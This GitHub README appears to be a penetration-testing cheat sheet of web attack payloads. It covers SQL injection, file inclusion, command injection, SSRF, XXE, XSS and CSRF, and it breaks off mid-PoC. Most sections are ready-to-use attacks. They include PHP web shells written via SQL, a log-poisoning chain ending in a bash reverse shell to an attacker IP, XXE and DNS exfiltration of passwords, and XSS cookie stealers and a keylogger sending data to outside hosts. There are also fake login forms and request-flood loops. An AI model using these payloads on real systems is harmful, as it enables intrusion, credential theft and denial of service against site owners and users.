Skip to content

Latest commit

 

History

History
1711 lines (1387 loc) · 76.1 KB

README.md

File metadata and controls

1711 lines (1387 loc) · 76.1 KB

Web vulnerabilities

Index

SQL Injection

Introduction

Tools

More

Database Commands

  • MySQL

    • Connect to the database: mysql -u root -p'root' -h <IP> -P 3306
    • Retrieve the DB version: select version();
    • Inspect the current session's user: select system_user();
    • List all available databases: show databases;
      • Use a specific database: USE databasetmp
      • Show tables in the database: SHOW TABLES
    • Inspect user rooter's encrypted password: SELECT user, authentication_string FROM mysql.user WHERE user = 'rooter';
  • MSSQL

    • Connect to remote instance via Impacket: impacket-mssqlclient <user>:<password>@<IP> -windows-auth
    • Retrieve the DB version: SELECT @@version;
    • List all available databases: SELECT name FROM sys.databases;
    • Inspect the available tables in the tempdb database: SELECT * FROM tempdb.information_schema.tables;
    • Select from a specific table: SELECT * from tempdb.dbo.users;

Types of SQL Injection

Error-Based SQL Injection

  • ' OR '1'='1
  • ' OR '1'='1' --
  • ' OR 1=1 #'
  • ' UNION SELECT NULL,NULL,NULL--
    • Add/remove NULLs to make the query work
    • Note: On Oracle, they work differently. See PortSwigger
  • Accessories' UNION SELECT table_name, NULL FROM all_tables--
  • Accessories' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name='USERS_BIZMOI'--
  • Accessories' UNION SELECT PASSWORD_ZRFHII, USERNAME_SCSVZM FROM USERS_BIZMOI--
  • ' UNION SELECT NULL,username||'~'||password FROM users--
  • 1 UNION SELECT username||':'||password FROM users--

Blind SQL Injection

Blind - Boolean-Based

  • First char: xyz' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 'm
  • Second char: xyz' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 2, 1) = 'm
  • Third char: xyz' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 3, 1) = 'm
  • Note: This can be automated with Intruder Cluster bomb

Blind - Error-Based

  • TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    • Test length of a password
  • TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

Blind - Verbose SQL Errors

  • CAST((SELECT example_column FROM example_table) AS int)
  • Cookie: TrackingId=' AND 1=CAST((SELECT username FROM users) AS int)--
  • Cookie: TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
  • Cookie: TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

Blind - Time-Based

  • '; IF (1=1) WAITFOR DELAY '0:0:10';--
  • '; IF (1=2) WAITFOR DELAY '0:0:10';--
  • '; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--
    • Testing the existence of the table users
  • '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--
    • Testing the existence of the column username
  • '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'pass%')=1) WAITFOR DELAY '0:0:10';--
    • Testing the presence of another column, in this case, searching if it starts with pass. Using % you can test letter by letter
  • '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users')>3) WAITFOR DELAY '0:0:10';--
    • See how many columns there are in the DB
  • '; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'butch' AND password_hash='8' WAITFOR DELAY '0:0:5'--
    • Discover password_hash
  • '; update users set password_hash = 'tacos123' where username = 'butch';--
    • Try to update user creds
    • Verify the success with the query: '; IF ((select count(username) from users where username = 'butch' and password_hash = 'tacos123')=1) WAITFOR DELAY '0:0:10';--
    • For the hash, try various combinations (md5sum, sha1sum, sha256sum): echo -n 'tacos123' | md5sum
      • '; update users set password_hash = '6183c9c42758fa0e16509b384e2c92c8a21263afa49e057609e3a7fb0e8e5ebb' where username = 'butch';--
  • See exploit: Exploit DB

Blind - Delay with Conditions

  • x'%3b SELECT CASE WHEN 1=1 THEN pg_sleep(10) ELSE pg_sleep(0) END--
  • x'%3b SELECT CASE WHEN (LENGTH(password)=20) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator'--
  • x'%3b SELECT CASE WHEN (SUBSTRING(password,1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator'--
    • To automate this: Resource pool > New resource pool with Max Concurrent requests = 1

DNS Lookup

  • x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://wggnzi1futt3lvlzdsfuiwfdg4mvapye.oastify.com/"> %remote;]>'),'/l') FROM dual--
  • x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.chx30y2vv9ujmbmfe8gajcgthknbb6zv.oastify.com/"> %remote;]>'),'/l') FROM dual--
  • ' OR 1=1 ; exec master.dbo.xp_dirtree '\\192.168.49.239\test';--
    • Useful with sudo responder -I tun0 to take hashes from Windows OS

HTML Encoding

Notes

SQLi Discovery and Exploitation

  • If you find a path/slug, you might find an SQLi
  • SELECT "<?php echo system($_GET['cmd']); ?>" into outfile "/var/www/html/web/backdoor.php"
  • ' UNION SELECT ("<?php echo system($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/command.php' -- -'
  • %27%20union%20select%20%27%3C?php%20echo%20system($_REQUEST[%22bingo%22]);%20?%3E%27%20into%20outfile%20%27/srv/http/cmd.php%27%20--%20-

Extract Database Information

  • Extract the version: ?id=1 union all select 1, 2, @@version
  • Extract the database user: ?id=1 union all select 1, 2, user()
  • Extract table names: ?id=1 union all select 1, 2, table_name from information_schema.tables
  • Extract table columns: ?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
  • Example of extracting the users table: ?id=1 union all select 1, username, password from users

Authentication Bypass

  • tom’ or 1=1 LIMIT 1;#
    • # is a comment marker in MySQL/MariaDB
    • LIMIT 1 is to return a fixed number of columns and avoid errors when our payload is returning multiple rows

Insert a New User

insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");

Local File Inclusion (LFI)

  • Using the load_file function: ?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

Remote Code Execution (RCE)

  • EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    xp_cmdshell 'COMMAND';
  • EXEC sp_configure 'allow updates', 0
    RECONFIGURE
    EXEC sp_configure 'show advanced options', 1
    GO
    RECONFIGURE
    GO
    EXEC sp_configure 'xp_cmdshell', 1
    GO
    RECONFIGURE
    GO
    xp_cmdshell 'COMMAND';
  • Write a PHP shell using the OUTFILE function: ?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'. Then access backdoor.php&cmd=ipconfig.

sqlmap

  •  > SQLMap: sqlmap -u https://vulnerable/index.php?id=1
    		    -l (to parse a Burp log file)
    		    --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3		  
    		    --force-ssl --threads 5 --level 1 --risk 1 --tamper=space2comment
    
  • sqlmap -u http://victim/page.php?param=1 -p param test the parameter param
    • sqlmap -u http://victim/page.php?param=1 -p param --dump dump the entire database
    • Add -D DATABASE_NAME and -T TABLE_NAME to dump a specific database/table
  • sqlmap -r request.txt -p param --os-shell gain shell
  • sqlmap -u http://vulnerable.com --forms --crawl=10 --level=5 --risk=3 to crawl
  • sqlmap -u http://vulnerable.com --batch non interactive mode

How to fix SQL injections: Use parameterized queries/prepared statements to protect against SQL injections by isolating user input from SQL code. They add placeholders for user input in SQL statements, creating a layer of isolation and preventing user input from affecting SQL code.

Authentication vulnerabilities

Multi-factor authentication

  • Response manipulation, try to intercept the response and modify the status to 200
  • Status code manipulation, change the code from 4xx to 200
  • 2FA code leakage in the response
  • JS File Analysis
  • 2FA Code Reusability
  • Lack of Bruteforce protection
  • The 2FA code can be used for any user
  • CSRF on 2FA disabling
  • Password reset disable 2FA
  • Bypass 2FA with null or 000000
  • Access the content directly
  • Login with Oauth to bypass 2FA
  • If you get logged-out after failed attempts, use macros with Burp

Password reset

Rate-limit

Web Cache Deception

  • Attacker send to a victim a 404 endpoint like site.com/dir/ok.css
  • Victim click on it, the CDN cache the page
  • Attacker goes to site.com/dir/ok.css, now it can see the page of the Victim

Misc tests

  • Password change
  • Keeping users logged in
  • Test "remember me" functionality
  • PHP protections can be bypassed with [], like password=123 to password[]=123
  • Replace password with a list of candidates, example
    "username":"usertest"
    "password":[
     "123456",
     "password",
     "qwerty",
     ...
  • Search for Open Redirect in login and register
  • For phpMyAdmin, check default credential root and blank password

Directory Traversal

Directory traversal vulnerabilities allow an attacker to read local secret files. To identify these vulnerabilities, you can search for file extensions in URL query strings and common vulnerable parameters like file, path and folder (see scripts/fg.rb)

Exploitations / Bypasses

  • simple case https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
  • absolute path https://insecure-website.com/loadImage?filename=/etc/passwd
  • stripped non-recursively https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd
  • superfluous URL-decode https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd
  • validation of start of path https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd
  • validation of start of path https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png

Search for

  • windows\win.ini
  • c:\windows\system32\drivers\etc\hosts
  • etc/passwd

File inclusion

File inclusion vulnerabilities allow an attacker to include a file into the application’s running code. To identify these vulnerabilities, you can search for file extensions in URL query strings and common vulnerable parameters like file, path and folder (see scripts/fg.rb).

Local File Inclusion (LFI): execute a local file

  • Try zip://, php:// and other wrappers
    • With zip:// you can achieve RCE. Example: http://192.168.190.229/index.php?file=zip:///var/www/html/uploads/upload_1692869993.zip%23php-reverse-shell.php

Apache's access.log contamination

  1. Once found a LFI, read the Apache's access.log http://victim.com/page.php?file=<PAYLOAD>
    • Use C:\xampp\apache\logs\access.log or ../../../../../../../../../var/log/apache2/access.log
  2. Notice which values from requests are saved. Contaminate Apache logs by sending this payload <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?> in the User-Agent
  3. Execute a RCE with http://victim.com/page.php?file=<apache/access.log>&cmd=ipconfig. It will load the contaminated logs and perform an RCE thanks to shell_exec($_GET['cmd'])
  4. Run a reverse shell using a listener nc -nvlp 4444 and in &cmd use bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

Remote File Inclusion (RFI): execute a remote file

  • An example: http://<VICTIM>/menu.php?file=http://<ATTACKER>/evil.php

PHP Wrappers

  • ?file=data:text/plain,hello world
  • ?file=data:text/plain,<?php echo shell_exec("dir") ?>
  • ?file=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
  • Use the command curl http://victim.com/index.php?page=php://filter/convert.base64-encode/resource=admin.php to obtain the source code of admin.php encoded in base64. This is to not run the PHP and to fetch the source code
  • Other wrappers

To search

  • /var/log/apache2/access.log
  • /etc/passwd
  • /etc/shadow

OS Command Injection

Let's say that the vulnerable endpoint it's https://insecure-website.com/stockStatus?productID=381&storeID=29. The provide the stock information, the application runs the command stockpile.pl 381 29. If there is no OS Command Injection protection, by inserting the payload & echo abcdefg & in productID it's possible to execute the command echo.

For blind OS Command Injections

  • Time delay & ping -c 10 127.0.0.1 &
  • Redirecting output & whoami > /var/www/static/whoami.txt &
  • Out-of-band (OAST) techniques & nslookup kgji2ohoyw.web-attacker.com &

Ways of injecting OS commands

  • Both Windows and Unix-based systems
    • &
    • &&
    • |
    • ||
  • Unix-based systems only
    • ;
    • Newline with 0x0a or \n
    • injected command
    • $(injected command)

Resource

Business logic vulnerabilities

Examples

  • Excessive trust in client-side controls
  • 2FA broken logic
  • Failing to handle unconventional input
  • Inconsistent security controls
  • Weak isolation on dual-use endpoint
  • Password reset broken logic
  • Insufficient workflow validation
  • Flawed enforcement of business rules
  • Authentication bypass via encryption oracle
  • Account Takeover via type confusion
    • Play with parameters and flags to see if you can achieve ATO

Other cases:

Information Disclosure

What is information disclosure?

  • Data about other users, such as usernames or financial information
  • Sensitive commercial or business data
  • Technical details about the website and its infrastructure

What are some examples of information disclosure?

  • Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
  • Providing access to source code files via temporary backups
  • Explicitly mentioning database table or column names in error messages
  • Unnecessarily exposing highly sensitive information, such as credit card details
  • Hard-coding API keys, IP addresses, database credentials, and so on in the source code
  • Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
  • If you need to find UUID from an email, try to register the user and see if in the response it's disclosed. [Reference]

How do information disclosure vulnerabilities arise?

  • Failure to remove internal content from public content
  • Insecure configuration of the website and related technologies
  • Flawed design and behavior of the application

Access control vulnerabilities and privilege escalation

In the context of web applications, access control is dependent on authentication and session management:

  • Authentication identifies the user and confirms that they are who they say they are;
  • Session management identifies which subsequent HTTP requests are being made by that same user;
  • Access control determines whether the user is allowed to carry out the action that they are attempting to perform.

From a user perspective, access controls can be divided into the following categories:

  • Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
  • Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
  • Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it

IDORs tips

Tools

File upload vulnerabilities

Upload Functions check-list

  • Check if the method PUT is enabled
  • Integrations (from 3rd party)
    • XSS
  • Self Uploads
    • XML based (Docs/PDF)
      • SSRF, XSS
    • Image
      • XSS, Shell
        • Name
        • Binary header
        • Metadata
  • Where is data stored?
  • s3 perms
  • GCS perms

Extension Splitting

  • shell.php%00.png
  • shell.php%0A.png
  • shell.php\n.png
  • shell.php\u000a.png
  • shell.php\u560a.png
  • shell.php%E5%98%8A.png
  • shell.php;.png
  • shell.php%3B.png
  • shell.php\u003b.png
  • shell.php\u563b.png
  • shell.php%E5%98%BB.png

multipart/form-data POST request

POST / HTTP/2
Host: example.io
Content-Type: multipart/form-data; boundary=---------------------------374598703146120535182333328
Content-Length: 342

-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="key"

general
-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="file"; filename="file.pdf"
Content-Type: application/pdf

$content$
-----------------------------374598703146120535182333328--

Add magic bytes

Add magic bytes at the beginning of a file to bypass restrictions

echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r >> reverse.php.png
cat reverse.php >> reverse.php.png
  • Useful, for example, to upload .js files and bypass CSP restrictions

General tips

  • If the target creates an encrypter URL for your file, copy the domain and use the command echo data.target.com | waybackurls | httpx -mc 200, 403. If you find valid endpoints, it might be possible to have an information disclosure [Reference]

Resources

Server-side request forgery (SSRF)

SSRF with blacklist-based input filters bypass Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

  • Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1;
  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose or the domain firefox.fr is a DNS that point to 127.0.0.1.;
  • Obfuscating blocked strings using URL encoding or case variation.

SSRF with whitelist-based input filters bypass

  • You can embed credentials in a URL before the hostname, using the @ character. For example: https://expected-host@evil-host.
  • You can use the # character to indicate a URL fragment. For example: https://evil-host#expected-host.
  • You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host.
  • You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
  • You can use combinations of these techniques together.

Other tips

  • By combining it with an Open redirection, you can bypass some restrictions. An example: http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
  • For AWS, bypass some restrictions by hosting this PHP page [Reference]
    <?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>
  • If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
  • SSRF (Server Side Request Forgery) testing resources
  • If the target runs Windows, try to steal NTLM hashes with Responder [Reference]
    • /vulnerable?url=http://your-responder-host
  • <?php header('Location: file:///Users/p4yl0ad/.ssh/id_rsa');?>
  • If the app saves files locally but doesn't change the file name, you might RCE. This works on Linux:
    "pippo.pdf`ping my.burpcollaborator.org"
    

Common endpoints

  • Webhooks
    • Try to send requests to internal resources
  • PDF Generator
    • If there is an HTML Injection in a PDF generator, try call internal resources with something like <iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" title="SSRF test">, with these tags <img>, <script>, <base> or with the CSS element url()
  • Document parsers
    • If it's an XML doc, use the PDF Generator approach
    • In other scenarios, see if there is any way to reference external resources and let server make requests to internal resources
  • Link expansion, [Reference]
  • File uploads
    • Instead of uploading a file, upload a URL. An example
    • Use an SVG file
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
      	<image xlink:href="https://example.com/test.png"/>
      </svg>

Common payloads

  • http://127.0.0.1
  • http://localhost/
  • http://169.254.169.254/
  • http://169.254.169.254/latest/meta-data/
  • http://instance-data
    • alternative to 169.254.169.254
  • http://metadata.google.internal/
  • https://kubernetes.default.svc/metrics [Random Robbie's tweet]

Resources

Open redirection

Bypasses

XXE injection

  • Exploiting XXE to retrieve files
    Original
    <?xml version="1.0" encoding="UTF-8"?>
    <stockCheck><productId>381</productId></stockCheck>
    Modified
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <stockCheck><productId>&xxe;</productId></stockCheck>
  • Exploiting XXE to perform SSRF attacks
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerablewebsite.com/"> ]>
  • Exploiting blind XXE exfiltrate data out-of-band
    Example
    <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>
  • Exfiltrate data out-of-band
    for-the-malicious-web-server.dtd
    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://webattacker.com/?x=%file;'>">
    %eval;
    %exfil;
    Submit to vulnerable server
    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://webattacker.com/malicious.dtd"> %xxe;]>
  • Exploiting blind XXE to retrieve data via error messages
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
    %eval;
    %error;
  • Exploiting blind XXE by repurposing a local DTD
    Suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd
    <!DOCTYPE foo [
    <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
    <!ENTITY % custom_entity '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
    &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    '>
    %local_dtd;
    ]>
    To locate the DTD file, submit the payload
    <!DOCTYPE foo [
    <!ENTITY % local_dtd SYSTEM
    "file:///usr/share/yelp/dtd/docbookx.dtd">
    %local_dtd;
    ]>
  • Try with xinclude to achieve SSRF or LFI
    <?xml version="1.0" encoding="utf-8" ?>
    <username xmls:xi="https://w3.org/2001/XInclude">
      <xi:include parse="text" href="file:///c:/windows/win.ini">
    </username>

Attack surfaces

  • XInclude attacks
    <foo xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include parse="text" href="file:///etc/passwd"/></foo>
  • XXE attacks via file upload with .svg
    <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITYxxe SYSTEM "file:///etc/hostname" > ]>
    <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <text font-size="16" x="0" y="16">&xxe;</text>
    </svg>
  • XXE attacks via modified content type
    For example, Content-Type: application/x-www-form-urlencoded -> Content-Type: text/xml

Manually testing for XXE vulnerabilities generally involves

  • Testing for file retrieval
  • Testing for blind XXE vulnerabilities
  • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document

Notes

  • In an endpoint like "ping/pong" you might send a request to include xml
  • Try to chain it with LFI for an RCE
  • Basic payload
    <?xml version="1.0" encoding="UTF-8" ?>
    <!DOCTYPE writeup [<!ENTITY xxe SYSTEM "http://10.10.14.38/ping.php" >]>
    <writeup>&xxe;</writeup>

Cross-site scripting (XSS)

Bookmarks

Tools

Resources

Bypasses

CSP

Blind XSS

  • Insert a payload in the User-Agent, try with the match/replace rule
  • Other endpoints: pending review comments, feedback

Swagger XSS

Carriage Return Line Feed (CRLF) injection

  • /%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
  • /%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
  • Nuclei template %USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml

Payloads

  • HTML injection
    • Steal credentials
      <form action="http://malicious-website.com/steal-credentials" method="post"><label for="username">Username:</label><input type="text" id="username" name="username"><br><label for="password">Password:</label><input type="password" id="password" name="password"><br><input type="submit" value="Log In"></form>
    • <div style="background-color:white;position:fixed;width:100%;height:100%;top:0px;left:0px;z-index:1000;margin: auto;padding: 10px;"><p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a></div>
    • <p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">
  • For hidden inputs: accesskey="X" onclick="alert(1)" then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X
  • For mobile applications: try to use as a vector the name of the phone with a payload like "/><script>alert(1)</script>
  • XSS Without parentheses
  • iframe + base64 encoded SVG
    <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>
  • Small SVG base64
    data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxyZWN0IHdpZHRoPSIxIiBoZWlnaHQ9IjEiLz48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+
  • Cookie stealers
    • fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});
    • document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')
    • <img src=x onerror=this.src='http://ATTACKER-WEBSITE/?x='+document.cookie;>
  • Keylogger [Reference]
    setTimeout(function () {
      a = document.getElementsByName('password')[0];
      b = document.getElementsByName('email')[0];
      function f() {
        fetch(`https://calc.sh/?a=${encodeURIComponent(a.value)}&b=${encodeURIComponent(b.value)}`);
      }
      a.form.onclick=f;
      a.onchange=f;
      b.onchange=f;
      a.oninput=f;
      b.oninput=f;
    }, 1000)
    
  • Unusual events
    • onpointerrawupdate (Chrome only)
    • onmouseleave
  • Can't use alert, confirm or prompt?
  • For a _blank page, try with javascript:alert(window.parent.document.cookie)
  • This lead the page to make a loop of requests, eventually causing being blocked by a WAF and being a potential DoS
    for(;;){fetch('https://VICTIM/',{method:'GET'});}
    for (;;) Promise.all(Array.from({ length: 20 }, () => fetch("https://VICTIM", { method: "GET" })));
  • data:text/javascript,console.log(3 + '\n' + `};console.log(1);//<img src=x onerror=javascript:console.log(2) oncopy=console.log(4)>`);//&quot; onerror=console.log(5) id=&quot;x
  • DOM XSS in jQuery selector sink using a hashchange event
    • <iframe src="https://VICTIM.net/#" onload=this.src='http://ATTACKER/?x='+document.cookie;></iframe>
    • <iframe src="https://VICTIM.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
  • source 1, source 2
    <a href=jav%26%23x61%3bscript:alert()>
  • AngularJS
    • {{$on.constructor('alert(1)')()}}
  • AngularJS sandbox escape without strings: 1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
  • AngularJS sandbox escape and CSP: <input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>#x';
  • Steal values from inputs
    <input name=username id=username>
    <input type=password name=password onchange="if(this.value.length)fetch('https://ATTACKER',{
    method:'POST',
    mode: 'no-cors',
    body:username.value+':'+this.value
    });">
  • XSS to CSRF
    <script>
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get','/my-account',true);
    req.send();
    function handleResponse() {
        var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
        var changeReq = new XMLHttpRequest();
        changeReq.open('post', '/my-account/change-email', true);
        changeReq.send('csrf='+token+'&[email protected]')
    };
    </script>
  • From @kinugawamasato
    <input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">
    <p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">
  • XSS to Form Hijacking
    document.forms['form1'].action = 'https://ATTACKER';

Misc payloads

" onload=alert() alt="
<img src=x onerror=alert()>
javascript:alert(document.cookie)
%253c%252fscript%253e%253cscript%253ealert(document.cookie)%253c%252fscript%253e
<a href="jAvAsCrIpT:alert(1)">payload</a>
%22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22
1672&81782%26apos%3b%3balert(%26apos%3bXSS%26apos%3b)%2f%2f232=1
<svg/onload=alert(0)>
<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
%22-alert(document.cookie)-%22
%00%22%3E%3Cimg%20src%3da%20onerror%3dconfirm(document.domain)%3E
<><img src=x onerror=alert()>
<body onresize=print() onload=this.style.width='100px'>
<xss id=x onfocus=alert(document.cookie) tabindex=1>
"><svg><animatetransform onbegin=alert(1)>
http://foo?&apos;-alert(1)-&apos;
${alert(1)}
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>
'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'
<button popovertarget=x>CLICKME</button><input type="text" readonly="readonly" id="x" popover onbeforetoggle=window.location.replace('http:attacker.com') />
javascript://redacted.com%0aalert(1)

XSS -> ATO Escalation [Reference]

  • Change email > Password reset
  • Change phone number > SMS password reset
  • Add SSO (Google, Github etc.)
  • Add authentication method (email, sms etc.) > Password reset
  • Change password
  • Change security questions
  • Cross Site Tracing: If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. [Reference]
  • Steal Cookies
  • Steal API key
  • Add admin user to the application
  • Hijack oAuth flow and steal code
  • Steal SSO code to adjacent app, then reverse SSO back to main app

Some examples

Cross-site request forgery (CSRF)

  • Remove the entire token
  • Use any random but same-length token, or same-length+1/same-length-1
  • Use another user's token
  • Change from POST to GET and delete the token
  • If it's a PUT or DELETE request, try POST /profile/update?_method=PUT or
    POST /profile/update HTTP/1.1
    Host: vuln.com
    ...
    
    _method=PUT
  • If the token it's in a custom header, delete the header
  • Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/html, application/xml
  • If there is double submit token, try CRLF injection
  • Bypassing referrer check
    • If it's checked but only when it exists, add to the PoC <meta name="referrer" content="never">
    • Regex Referral bypass
      - https://attacker.com?victim.com
      - https://attacker.com;victim.com
      - https://attacker.com/victim.com/../victimPATH
      - https://victim.com.attacker.com
      - https://attackervictim.com
      - https://[email protected]
      - https://attacker.com#victim.com
      - https://attacker.com\.victim.com
      - https://attacker.com/.victim.com
      
  • CSRF token stealing via XSS/HTMLi/CORS
  • JSON based
    • Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data
    • Use flash + 307 redirect
  • Guessable CSRF token
  • Clickjacking to strong CSRF token bypass
  • Type juggling
  • Use array, from csrf=token to csrf[]=token
  • Set the CSRF token to null or add null bytes
  • Check whether CSRF token is sent over http or sent to 3rd party
  • Generate multiple CSRF tokens, pick the static part. Play with the dynamic part

Simple PoC

<form method="POST" action="https://VICTIM/my-account/settings/change-email">
        <input type="hidden" name="email" value="user1%40evil.net">
</form>
<script>
